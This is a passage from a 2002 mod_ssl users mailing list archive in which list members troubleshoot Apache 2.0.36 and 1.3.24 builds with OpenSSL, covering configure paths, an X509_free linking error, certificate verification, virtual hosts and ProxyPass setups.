it's my best guess at the moment.  My ./configure script says this there:

checking whether to enable mod_ssl... checking dependencies
checking for SSL/TLS toolkit base... /usr
checking for SSL/TLS toolkit version...
checking for SSL/TLS toolkit includes... /usr/include
checking for SSL/TLS toolkit libraries... /usr/lib
  adding "-I/usr/include/openssl" to INCLUDES
  adding "-lssl" to LIBS
  adding "-lcrypto" to LIBS
checking for SSL_set_state... no
checking for SSL_set_cert_store... no
checking whether to enable mod_ssl... yes (default)

Hope this helps,

--Cliff

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Sat Jun 15 11:11:03 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id LAA18521; Sat, 15 Jun 2002 11:10:09 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from mta07-svc.ntlworld.com id LAA18480; Sat, 15 Jun 2002 11:09:14 +0200 (MET DST)
Received: from ws ([80.6.192.198]) by mta07-svc.ntlworld.com
          (InterMail vM.4.01.03.27 201-229-121-127-20010626) with SMTP
          id <20020615090914.MILO19225.mta07-svc.ntlworld.com@ws>;
          Sat, 15 Jun 2002 10:09:14 +0100
Message-ID: <069b01c2144b$7325e040$667ba8c0@ws>
From: "Zac Hillier" 
To: "Cliff Woolley" 
Cc: 
References: 
Subject: Re: installing with apache 2 and mod_ssl
Date: Sat, 15 Jun 2002 10:01:19 +0100
Organization: Net Affectors
MIME-Version: 1.0
Content-Type: text/plain;
	charset="iso-8859-1"
Content-Transfer-Encoding: 7bit
X-Priority: 3
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook Express 5.50.4522.1200
X-MimeOLE: Produced By Microsoft MimeOLE V5.50.4910.0300
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Zac Hillier" 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

Cliff,

Thanks for your help. Hmm however...

I now seem able to get apache to locate openssl and I'm now getting an error
during the configure.

The configure line reads:

./configure --with-ssl=/home/wserve/_s-store/openssl-0.9.6c --enable-ssl --e
nable-mods-all=shared --prefix=/usr/local/apache2

The error and line above read:

Checking for SSL/TLS toolkit base... /home/wserve/_s-store/openssl-0.9.6c
Checking for SSL/TLS toolkit version...
Checking for SSL/TLS toolkit includes...
/home/wserve/_s-store/openssl-0.9.6c/include
Checking for SSL/TLS toolkit libraries... configure: error: OpenSSL
libraries not found

So I checked in the openssl folder an there is no obvious lib or library
folder, I've tried re-installing openssl but the same happens, can you tell
me where to go next?

Thanks for any help

Zac

----- Original Message -----
From: "Cliff Woolley" 
To: "Zac Hillier" 
Cc: 
Sent: Friday, June 14, 2002 11:21 PM
Subject: Re: installing with apache 2 and mod_ssl


> On Fri, 14 Jun 2002, Zac Hillier wrote:
>
> > Can you help? I'm trying to install apache 2.0.36 with mod_ssl and
having
> > real trouble I have re-installed a couple of times now once specifically
> > with --enable-ssl=shared and once with --enable-shared=all each time the
> > mod_ssl does not appear to compile into the modules dir and is not
present
> > in any of the conf files?
>
> What does the configure output say around the spot where it says "checking
> whether to enable mod_ssl"?  Chances are, it's not finding your OpenSSL
> installation (which is a dependency for mod_ssl), and it's therefore
> skipping mod_ssl.  (Hint: use --with-ssl= to tell it where to look.)
> Now, it's strange that it would do that with --enable-shared=all (=all is
> supposed to me "fail if you can't find some module's dependencies"), but
> it's my best guess at the moment.  My ./configure script says this there:
>
> checking whether to enable mod_ssl... checking dependencies
> checking for SSL/TLS toolkit base... /usr
> checking for SSL/TLS toolkit version...
> checking for SSL/TLS toolkit includes... /usr/include
> checking for SSL/TLS toolkit libraries... /usr/lib
>   adding "-I/usr/include/openssl" to INCLUDES
>   adding "-lssl" to LIBS
>   adding "-lcrypto" to LIBS
> checking for SSL_set_state... no
> checking for SSL_set_cert_store... no
> checking whether to enable mod_ssl... yes (default)
>
> Hope this helps,
>
> --Cliff
>
>
>

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Sat Jun 15 11:18:03 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id LAA18808; Sat, 15 Jun 2002 11:17:08 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from deepthought.cs.virginia.edu id LAA18778; Sat, 15 Jun 2002 11:16:34 +0200 (MET DST)
Received: from localhost (root@localhost)
	by deepthought.cs.virginia.edu (8.11.6/8.11.4) with ESMTP id g5F9C7v20574;
	Sat, 15 Jun 2002 05:12:07 -0400
Date: Sat, 15 Jun 2002 05:12:07 -0400 (EDT)
From: Cliff Woolley 
X-X-Sender: root@deepthought.cs.virginia.edu
To: Zac Hillier 
cc: modssl-users@modssl.org
Subject: Re: installing with apache 2 and mod_ssl
In-Reply-To: <069b01c2144b$7325e040$667ba8c0@ws>
Message-ID: 
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Cliff Woolley 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

On Sat, 15 Jun 2002, Zac Hillier wrote:

> The configure line reads:
>
> ./configure --with-ssl=/home/wserve/_s-store/openssl-0.9.6c --enable-ssl --e
> nable-mods-all=shared --prefix=/usr/local/apache2

Is that the path to the source code distribution directory or the install
directory?  It should be the install directory prefix.  For example, my
OpenSSL is installed under /usr/lib with its include files in
/usr/include, so my configure argument is --with-ssl=/usr .

And I think you mean --enable-mods-shared=all rather than
--enable-mods-all=shared.  But that's a different issue.

--Cliff

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Sat Jun 15 13:27:03 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id NAA25786; Sat, 15 Jun 2002 13:26:08 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from mta07-svc.ntlworld.com id NAA25770; Sat, 15 Jun 2002 13:25:47 +0200 (MET DST)
Received: from ws ([80.6.192.198]) by mta07-svc.ntlworld.com
          (InterMail vM.4.01.03.27 201-229-121-127-20010626) with SMTP
          id <20020615112546.RGDJ19225.mta07-svc.ntlworld.com@ws>
          for ; Sat, 15 Jun 2002 12:25:46 +0100
Message-ID: <06eb01c2145e$8683ef70$667ba8c0@ws>
From: "Zac Hillier" 
To: 
Subject: undefined symbol: X509_free
Date: Sat, 15 Jun 2002 12:19:30 +0100
Organization: Net Affectors
MIME-Version: 1.0
Content-Type: text/plain;
	charset="iso-8859-1"
Content-Transfer-Encoding: 7bit
X-Priority: 3
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook Express 5.50.4522.1200
X-MimeOLE: Produced By Microsoft MimeOLE V5.50.4910.0300
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Zac Hillier" 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

Just recently, eventually got apache 2.0.36 installed with mod_ssl.

Now when I try to start apache with:

httpd -D SSL

I get an error:

Cannot load modules/mod_ssl.so into server : modules/mod_ssl.so:  undefined
symbol : X509_free

Anybody know what this means and how I can resolve it?

Thanks

Zac

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Sat Jun 15 15:48:07 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id PAA01201; Sat, 15 Jun 2002 15:47:13 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from sitesontesting.com id PAA01190; Sat, 15 Jun 2002 15:46:49 +0200 (MET DST)
Message-Id: <200206151346.PAA01190@opensource.ee.ethz.ch>
Received: from WorldClient [127.0.0.1]
	by sitesontesting.com [127.0.0.1]
	with SMTP (MDaemon.PRO.v5.0.5.R)
	for ; Sat, 15 Jun 2002 19:24:19 +0530
Date: Sat, 15 Jun 2002 19:24:08 +0530
From: "Prachait Saxena" 
To: modssl-users@modssl.org
Subject: Apache/2.0.36 + Win98 + SSL or PHP4=Error(31)
X-Mailer: WorldClient 5.0.5
X-MDRemoteIP: 127.0.0.1
X-Return-Path: subscription@sitesontesting.com
X-MDaemon-Deliver-To: modssl-users@modssl.org
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Prachait Saxena" 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

Hello !!!

I am using Apache/2.0.36 (Win32) DAV/2 on Win98.
my server  is running very fine when i use PHP4 as a interpreter.
but as i use " LoadModule  " to use PHP4 as a modules i am getting the 
error as
(31) A device attached to the system is not functioning:

This error also come when i try to load SSL
I also tried to run server on Win 2k. Same error :(


Can any one help me out. why this error is comming ?

Or where i am wrong ?

Thanks is advance
Prachait Saxena
WebMaster [SitesOnTesting.Com]

If you do for other's ! Other's will do for you !!
Visit me at http://www.sitesontesting.com/prachait


______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Sat Jun 15 17:27:03 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id RAA06524; Sat, 15 Jun 2002 17:26:08 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from deepthought.cs.virginia.edu id RAA06499; Sat, 15 Jun 2002 17:25:19 +0200 (MET DST)
Received: from localhost (root@localhost)
	by deepthought.cs.virginia.edu (8.11.6/8.11.4) with ESMTP id g5FFKqx30302
	for ; Sat, 15 Jun 2002 11:20:52 -0400
Date: Sat, 15 Jun 2002 11:20:52 -0400 (EDT)
From: Cliff Woolley 
X-X-Sender: root@deepthought.cs.virginia.edu
To: modssl-users@modssl.org
Subject: Re: undefined symbol: X509_free
In-Reply-To: <06eb01c2145e$8683ef70$667ba8c0@ws>
Message-ID: 
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Cliff Woolley 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

On Sat, 15 Jun 2002, Zac Hillier wrote:

> Just recently, eventually got apache 2.0.36 installed with mod_ssl.
> Now when I try to start apache with:
> httpd -D SSL
> I get an error:
>
> Cannot load modules/mod_ssl.so into server : modules/mod_ssl.so:  undefined
> symbol : X509_free

That's a still-outstanding bug in the Apache build process (a linking
problem, specifically).  It's triggered when you build a shared mod_ssl
against a static OpenSSL.  The workaround is to make them match -- I
recommend installing the shared version of OpenSSL (eg, /usr/lib/libssl.so
and /usr/lib/libcrypto.so instead of /usr/lib/libssl.a and
/usr/lib/libcrypto.a... see the mod_ssl install docs for how to accomplish
this), and then recompile mod_ssl.

What's happened in your case right now is that for some reason we're
linking OpenSSL into the httpd binary rather than into the mod_ssl DSO,
and the static linker is therefore throwing away all the symbols we need
because httpd itself doesn't use them.  When we go to dynamically link in
mod_ssl later, OpenSSL's symbols aren't there for us.

--Cliff

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Sat Jun 15 18:16:11 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id SAA10350; Sat, 15 Jun 2002 18:15:14 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from vanderkolk.cjb.net id SAA10325; Sat, 15 Jun 2002 18:14:53 +0200 (MET DST)
From: mod_ssl@vanderkolk.cjb.net
Received: from localhost (localhost [127.0.0.1])
  (uid 1011)
  by vanderkolk.cjb.net with local; Sat, 15 Jun 2002 18:18:39 +0200
To: "mod_ssl mailing list" 
Subject: problems connecting to https
Date: Sat, 15 Jun 2002 18:18:38 +0200
Mime-Version: 1.0
Content-Type: text/plain; format=flowed; charset="iso-8859-1"
Content-Transfer-Encoding: 7bit
Message-ID: 
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: mod_ssl@vanderkolk.cjb.net
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

Hello, 

I've installed apache 1.3.24 with mod_ssl-2.8.8-1.3.24, using the 
instructions on www.mod-ssl.org. To generate the certificates, I used make 
certificates.
Starting the apache with /usr/local/apache/bin/apachectl startssl is no 
problem as well. The output of netstat -lp tells me that I have httpd 
listening on the secure port I've specified. 

When I test my connection using :
openssl s_client -connect localhost:443 -state -debug
things go wrong. The last part of the output says: 

No client certificate CA names sent
 ---
SSL handshake has read 1257 bytes and written 320 bytes
 ---
New, TLSv1/SSLv3, Cipher is EDH-RSA-DES-CBC3-SHA
Server public key is 1024 bit
SSL-Session:
   Protocol  : TLSv1
   Cipher    : EDH-RSA-DES-CBC3-SHA
   Session-ID: 
8AACF76997D3661407E1AB4679A9F56375AE761BDE061833B17ACF7B526616CA
   Session-ID-ctx:
   Master-Key: 
D977CE8560D5FD1C9443882B4E5CB3E0B303BC3B48AB7B7FE5D00DA267B20A95E59B516C411D 
E3D016CCA139A590095E
   Key-Arg   : None
   Start Time: 1024157834
   Timeout   : 300 (sec)
   Verify return code: 7 (certificate signature failure)
 --- 

And when I try to connect using IE I get a "page nog found" error. 

What do I have to do to make a secure connection work? 

Thanxs, 

Major
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Sun Jun 16 12:48:15 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id MAA00504; Sun, 16 Jun 2002 12:47:29 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from rwcrmhc52.attbi.com id MAA00463; Sun, 16 Jun 2002 12:46:48 +0200 (MET DST)
Received: from bohr ([12.241.5.8]) by rwcrmhc52.attbi.com
          (InterMail vM.4.01.03.27 201-229-121-127-20010626) with SMTP
          id <20020616071813.EUFA2751.rwcrmhc52.attbi.com@bohr>
          for ; Sun, 16 Jun 2002 07:18:13 +0000
Message-ID: <010f01c21507$303e9f80$6401a8c0@bohr>
From: "Phil Smiley" 
To: 
References: <5.1.0.14.0.20020611124908.00b1e798@mail.unitec.edu.ve> <033c01c211ab$b97a1220$6401a8c0@bohr> <3D073AEF.5020909@espgroup.net>
Subject: Re: 2.0.36 + mod-ssl + Win2k = Easy Money
Date: Sun, 16 Jun 2002 02:26:53 -0500
MIME-Version: 1.0
Content-Type: text/plain;
	charset="iso-8859-1"
Content-Transfer-Encoding: 7bit
X-Priority: 3
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook Express 6.00.2600.0000
X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2600.0000
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Phil Smiley" 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users


----- Original Message -----
From: "Dwayne Miller" 
To: 
Sent: Wednesday, June 12, 2002 7:13 AM
Subject: Re: 2.0.36 + mod-ssl + Win2k = Easy Money


> I just recently built the 2.0.36 + ssl tree and had similar results.
>  Although the error messages were slightly different, the root cause
> might be the same.
>
> Turns out that several .c and .h files are delivered with dates earlier
> than the .y and .l files they are built from.  However, the .c and .h
> files are actually up-to-date.  So, by simply 'touching' (I used an
> editor to add a blank line) to the .c and .h files to make their dates
> more recent than their source files, and the system will not try to
> build them again.  (I thought that I read that this problem had been
> corrected in the 2.0.36 tree, but apparently not).
>
> Anyway,  I also had to uninstall the bison utility (I did not have the
> other required tools, lex, sed and yacc anyway) before this would
> actually work.  Having bison on my system, even with the modified file
> dates, would still cause an error for some reason.  Removing bison and
> altering the file dates allowed the build to work as expected.
>
> The files that you need to 'touch' are
> ssl_expr_parse.c
> ssl_expr_parse.h
> ssl_expr_scan.c

In the version of Apache that I have (2.0.36), the .c and .h files above
have later dates than the .y and .l files.  Still, nmake tries to rebuild
them.  I got around this by taking out the generation steps in mod_ssl.mak.
This works.  I now have Apache 2.0..36 running on Win2K with ssl support.
Thanks to everyone on this thread for their suggestions and shared
experiences.

Phil

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Mon Jun 17 09:18:08 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id JAA10956; Mon, 17 Jun 2002 09:17:26 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from alpha13.family.net.nz id JAA10935; Mon, 17 Jun 2002 09:16:54 +0200 (MET DST)
Received: from xtra.co.nz (port-210-54-22-212.fastadsl.net.nz [210.54.22.212])
	by alpha13.family.net.nz (8.11.2/8.11.2) with ESMTP id g5H7GcX08219
	for ; Mon, 17 Jun 2002 19:16:39 +1200
Message-ID: <3D0D8E91.6070905@xtra.co.nz>
Date: Mon, 17 Jun 2002 19:24:01 +1200
From: David 
User-Agent: Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.0.0) Gecko/20020530
X-Accept-Language: en-us, en
MIME-Version: 1.0
To: modssl-users@modssl.org
Subject: SSL site loads regardless of URL??
Content-Type: text/plain; charset=us-ascii; format=flowed
Content-Transfer-Encoding: 7bit
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: David 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

Hi,

I have several virtually hosted web sites and only one site that is
configured for SSL on my server.

The issue is if someone uses https instead of http the certificated site 
pages load regardless of the url ie

http://stats.domain1.co.nz loads pages from ../domain1 which is correct.

https://stats.domain1.co.nz loads pages from ../donations, and the url 
remains https://stats.domain1.co.nz

I assume I have a misconfigured .conf file?

How can I resolve this, do I need to specify port 80 on the http sites 
or do I need to multi home the server with a unique IP for the SSL site?


Thanks

-David.


Below is an illustration of the httpd.conf.


ServerName www.donations.org.nz
DocumentRoot /var/www/html/donations
ErrorLog /var/log/httpd/donations-error_log
TransferLog /var/log/httpd/donations-access_log


NameVirtualHost 219.88.240.45


ServerName stats.domain1.co.nz
DocumentRoot /var/www/html/domain1
ErrorLog /var/log/httpd/domain1-error_log
TransferLog /var/log/httpd/domain1-access_log



ServerName stats.domain2.co.nz
DocumentRoot /var/www/html/domain2
ErrorLog /var/log/httpd/domain2-error_log
TransferLog /var/log/httpd/domain2-access_log



ServerName stats.domain3.co.nz
DocumentRoot /var/www/html/domain3
ErrorLog /var/log/httpd/domain3-error_log
TransferLog /var/log/httpd/domain3-access_log





______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Mon Jun 17 09:54:11 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id JAA12993; Mon, 17 Jun 2002 09:53:09 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from it0033.it-action.com id JAA12955; Mon, 17 Jun 2002 09:52:05 +0200 (MET DST)
Received: from itaction.co.uk ([194.106.52.27]) by
          it0033.it-action.com (Netscape Messaging Server 4.15) with ESMTP
          id GXUB6Q00.SZC for ; Mon, 17 Jun 2002
          08:52:02 +0100 
Message-ID: <3D0D9522.6060701@itaction.co.uk>
Date: Mon, 17 Jun 2002 08:52:02 +0100
From: "Peter Viertel" 
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.0.0+) Gecko/20020430
X-Accept-Language: en-us, en
MIME-Version: 1.0
To: modssl-users@modssl.org
Subject: Re: SSL site loads regardless of URL??
References: <3D0D8E91.6070905@xtra.co.nz>
Content-Type: text/plain; charset=us-ascii; format=flowed
Content-Transfer-Encoding: 7bit
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Peter Viertel" 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

Virtual hosts are defined agains the listening addresses you have for 
your host:

Not sure what some of the host names resolve to but assuming 192.168 
addresses are the actual ip of your host, and the other ip is the nat 
outside address for your host then the config would look like this:


ServerName www.donations.org.nz
DocumentRoot /var/www/html/donations
ErrorLog /var/log/httpd/donations-error_log
TransferLog /var/log/httpd/donations-access_log


NameVirtualHost 192.168.1.9:80


ServerName stats.domain1.co.nz
DocumentRoot /var/www/html/domain1
ErrorLog /var/log/httpd/domain1-error_log
TransferLog /var/log/httpd/domain1-access_log



ServerName stats.domain2.co.nz
DocumentRoot /var/www/html/domain2
ErrorLog /var/log/httpd/domain2-error_log
TransferLog /var/log/httpd/domain2-access_log



ServerName stats.domain3.co.nz
DocumentRoot /var/www/html/domain3
ErrorLog /var/log/httpd/domain3-error_log
TransferLog /var/log/httpd/domain3-access_log



David wrote:

> Hi,
>
> I have several virtually hosted web sites and only one site that is
> configured for SSL on my server.
>
> The issue is if someone uses https instead of http the certificated site
> pages load regardless of the url ie
>
> http://stats.domain1.co.nz loads pages from ../domain1 which is correct.
>
> https://stats.domain1.co.nz loads pages from ../donations, and the url
> remains https://stats.domain1.co.nz
>
> I assume I have a misconfigured .conf file?
>
> How can I resolve this, do I need to specify port 80 on the http sites
> or do I need to multi home the server with a unique IP for the SSL site?
>
>
> Thanks
>
> -David.
>
>
> Below is an illustration of the httpd.conf.
>
> 
> ServerName www.donations.org.nz
> DocumentRoot /var/www/html/donations
> ErrorLog /var/log/httpd/donations-error_log
> TransferLog /var/log/httpd/donations-access_log
> 
>
> NameVirtualHost 219.88.240.45
>
> 
> ServerName stats.domain1.co.nz
> DocumentRoot /var/www/html/domain1
> ErrorLog /var/log/httpd/domain1-error_log
> TransferLog /var/log/httpd/domain1-access_log
> 
>
> 
> ServerName stats.domain2.co.nz
> DocumentRoot /var/www/html/domain2
> ErrorLog /var/log/httpd/domain2-error_log
> TransferLog /var/log/httpd/domain2-access_log
> 
>
> 
> ServerName stats.domain3.co.nz
> DocumentRoot /var/www/html/domain3
> ErrorLog /var/log/httpd/domain3-error_log
> TransferLog /var/log/httpd/domain3-access_log
> 
>
>
>
>
> ______________________________________________________________________
> Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> User Support Mailing List                      modssl-users@modssl.org
> Automated List Manager                            majordomo@modssl.org



______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Mon Jun 17 15:23:16 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id PAA02410; Mon, 17 Jun 2002 15:21:16 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from maggotts.rnib.org.uk id PAA02388; Mon, 17 Jun 2002 15:20:48 +0200 (MET DST)
From: John.Airey@rnib.org.uk
Received: from pboroweb.rnib.org.uk (pboroweb.rnib.org.uk [194.128.16.145])
	by maggotts.rnib.org.uk (8.11.6/8.11.6) with ESMTP id g5HDKC010820
	for ; Mon, 17 Jun 2002 14:20:32 +0100
Received: by pboroweb.rnib.org.uk with Internet Mail Service (5.5.2650.21)
	id ; Mon, 17 Jun 2002 14:20:09 +0100
Message-ID: <9B66BBD37D5DD411B8CE00508B69700F02067202@pborolocal.rnib.org.uk>
To: modssl-users@modssl.org
Subject: RE: 1 certificate for several sites using redirection ?
Date: Mon, 17 Jun 2002 14:20:09 +0100
MIME-Version: 1.0
X-Mailer: Internet Mail Service (5.5.2650.21)
Content-Type: text/plain;
	charset="iso-8859-1"
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: John.Airey@rnib.org.uk
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

Generally speaking there isn't, however you can use mod_rewrite to rewrite
URLs for another site, but you would have to be reasonably consistent
otherwise writing the rules would be very difficult.

John

> -----Original Message-----
> From: Wim Godden [mailto:wim@godden.net]
> Sent: 12 June 2002 13:09
> To: modssl-users@modssl.org
> Subject: Re: 1 certificate for several sites using redirection ?
> 
> 
> So there's no system which allows me to really proxy pages 
> and 'modify' them so
> that all future connections go through this 'proxy' as well ?
> 
> Greetings,
> 
> Wim
> 
> Peter Viertel wrote:
> 
> > yes, i think thats whats happening - you need to review the website
> > content you are pointing at. For this to work you can't have any
> > absolute hrefs, and also the backend site may issue 
> redirects, for these
> > to work you need a ProxyPassReverse which will rewrite the Location:
> > header on any redirects the backend site may send.
> >
> >  For example:
> >
> > ProxyPass /test    http://other.subdomain.ourdomain.com/
> > ProxyPassReverse /test  http://other.subdomain.ourdomain.com/
> >
> > proxypassreverse unfortunately is not case insensitive, and 
> the backend
> > webserver may refer to itself canonically, so the location 
> headers may
> > have another hostname. Either fix up the backend webserver 
> to match the
> > proxypassreverse, or add extra proxypassreverse lines.
> >
> > The most common cause of redirects is the / bug handlers of 
> tomcat, and
> > IIS which kick in if your url ends with / and that resolves to a
> > directory, then the webserver looks up what the 
> directoryindex script is
> > (eg. index.html) and sends a redirect. This is something to do with
> > early revision browser releases, I have no idea which ones or if it
> > matters anymore.
> >
> > Also note that mod_proxy got a big upgrade at apache 
> release 1.3.23 that
> > may help things along too in certain cases.
> >
> > John.Airey@rnib.org.uk wrote:
> >
> > >Sounds like you have some absolute links rather than 
> relative links. You can
> > >also use
> > >proxypass /test https://other-subdomain.ourdomain.com
> > >
> > >If the data needs to be secured between the proxy and the 
> destination
> > >server.
> > >
> > >-
> > >John Airey
> > >Internet systems support officer, ITCSD, Royal National 
> Institute of the
> > >Blind,
> > >Bakewell Road, Peterborough PE2 6XU,
> > >Tel.: +44 (0) 1733 375299 Fax: +44 (0) 1733 370848 
> John.Airey@rnib.org.uk
> > >
> > >Is the statement 'There is no such thing as truth'  true?
> > >
> > >
> > >
> > >
> > >>-----Original Message-----
> > >>From: Wim Godden [mailto:wim@godden.net]
> > >>Sent: 12 June 2002 11:06
> > >>To: modssl-users@modssl.org
> > >>Subject: Re: 1 certificate for several sites using redirection ?
> > >>
> > >>
> > >>proxypass /test http://other-subdomain.ourdomain.com
> > >>doesn't work properly... I get errors about the images being
> > >>insecure and all links
> > >>point to the wrong position.
> > >>
> > >>
> > >>Peter Viertel wrote:
> > >>
> > >>
> > >>
> > >>>You could do that using reverse proxy, ie mod_proxy.
> > >>>Redirects are not going to help.
> > >>>
> > >>>Wim Godden wrote:
> > >>>
> > >>>
> > >>>
> > >>>>Hi,
> > >>>>
> > >>>>I'd like to use a certificate to secure several of our
> > >>>>
> > >>>>
> > >>subdomains...
> > >>
> > >>
> > >>>>buying hundreds of certificates is simply too expensive.
> > >>>>Is there some way to do this :
> > >>>>
> > >>>>- Install certificate on secure.ourdomain.com
> > >>>>- Let people surf to
> > >>>>
> > >>>>
> > >>>https://secure.ourdomain.com/other-subdomain.ourdomain.com/wh
> > >>>
> > >>>
> > >at-ever-page.html
> > >
> > >
> > >>>Thanks in advance.
> > >>>
> > >>>
> > >>>Greetings,
> > >>>
> > >>>Wim Godden
> > >>>
> > 
> >>>___________________________________________________________
> ___________
> > >>>Apache Interface to OpenSSL (mod_ssl)                   
> www.modssl.org
> > >>>User Support Mailing List                      
> modssl-users@modssl.org
> > >>>Automated List Manager                            
> majordomo@modssl.org
> > >>>
> > >>>
> > >>>
> > >>>
> > 
> >>____________________________________________________________
> __________
> > >>Apache Interface to OpenSSL (mod_ssl)                   
> www.modssl.org
> > >>User Support Mailing List                      
> modssl-users@modssl.org
> > >>Automated List Manager                            
> majordomo@modssl.org
> > >>
> > >>
> > >
> > >--
> > >------
> > >Adverteren.be - 100% Nederlandstalig adverteren op 
> kwalitatief hoogstaande
> > >sites !
> > >
> > >
> > 
> >_____________________________________________________________
> _________
> > >Apache Interface to OpenSSL (mod_ssl)                   
> www.modssl.org
> > >User Support Mailing List                      
> modssl-users@modssl.org
> > >Automated List Manager                            
> majordomo@modssl.org
> > >
> > >-
> > >
> > >NOTICE: The information contained in this email and any 
> attachments is
> > >confidential and may be legally privileged. If you are not the
> > >intended recipient you are hereby notified that you must not use,
> > >disclose, distribute, copy, print or rely on this email's 
> content. If
> > >you are not the intended recipient, please notify the sender
> > >immediately and then delete the email and any attachments from your
> > >system.
> > >
> > >RNIB has made strenuous efforts to ensure that emails and any
> > >attachments generated by its staff are free from viruses. 
> However, it
> > >cannot accept any responsibility for any viruses which are
> > >transmitted. We therefore recommend you scan all attachments.
> > >
> > >Please note that the statements and views expressed in this email
> > >and any attachments are those of the author and do not necessarily
> > >represent those of RNIB.
> > >
> > >RNIB Registered Charity Number: 226227
> > >
> > >Website: http://www.rnib.org.uk
> > >
> > >14th June 2002 is RNIB Look Loud Day - visit 
> http://www.lookloud.org.uk to
> > >find out all about it.
> > >
> > 
> >_____________________________________________________________
> _________
> > >Apache Interface to OpenSSL (mod_ssl)                   
